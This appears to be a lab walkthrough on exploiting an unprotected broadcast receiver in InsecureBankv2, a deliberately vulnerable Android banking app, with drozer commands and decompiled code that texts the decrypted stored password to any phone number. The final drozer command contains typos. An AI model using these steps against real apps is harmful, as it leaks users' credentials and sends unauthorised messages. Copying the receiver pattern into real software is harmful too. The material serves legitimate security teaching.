Exploit Broadcast Receivers

• Information Gathering

# Using drozer get the broadcast receivers informations
dz> run app.broadcast.info -a com.android.insecurebankv2 
Attempting to run shell module
Package: com.android.insecurebankv2
  com.android.insecurebankv2.MyBroadCastReceiver
    Permission: null

• Static Analysis MyBroadCast Activity

package com.android.insecurebankv2;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.telephony.SmsManager;
import android.util.Base64;

/* JADX WARN: Classes with same name are omitted:
  /home/sallam/Documents/Android AppSec/vulnApps/InsecureBankv2/build/apk/classes.dex
 */
/* loaded from: /tmp/jadx-4403557323843835393.dex */
public class MyBroadCastReceiver extends BroadcastReceiver {
    public static final String MYPREFS = "mySharedPreferences";
    String usernameBase64ByteString;

    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context, Intent intent) {
        String phn = intent.getStringExtra("phonenumber");
        String newpass = intent.getStringExtra("newpass");
        if (phn != null) {
            try {
                SharedPreferences settings = context.getSharedPreferences("mySharedPreferences", 1);
                String username = settings.getString("EncryptedUsername", null);
                byte[] usernameBase64Byte = Base64.decode(username, 0);
                this.usernameBase64ByteString = new String(usernameBase64Byte, "UTF-8");
                String password = settings.getString("superSecurePassword", null);
                CryptoClass crypt = new CryptoClass();
                String decryptedPassword = crypt.aesDeccryptedString(password);
                String textPhoneno = phn.toString();
                String textMessage = "Updated Password from: " + decryptedPassword + " to: " + newpass;
                SmsManager smsManager = SmsManager.getDefault();
                System.out.println("For the changepassword - phonenumber: " + textPhoneno + " password is: " + textMessage);
                smsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);
                return;
            } catch (Exception e) {
                e.printStackTrace();
                return;
            }
        }
        System.out.println("Phone number is null");
    }
}

This code defines a BroadcastReceiver that listens for specific intents containing a phone number and a new password. When triggered, it retrieves encrypted username and password from shared preferences, decrypts the password, and sends an SMS to the given phone number with a message about the password update. If the phone number is not provided, it logs that the phone number is null.

• Exploit send message tophone number 8888888 with new password

dz> run app.broadcast.send --action thBroadcast --extra string phonenummber 8888888 --extra string newpass Lol@88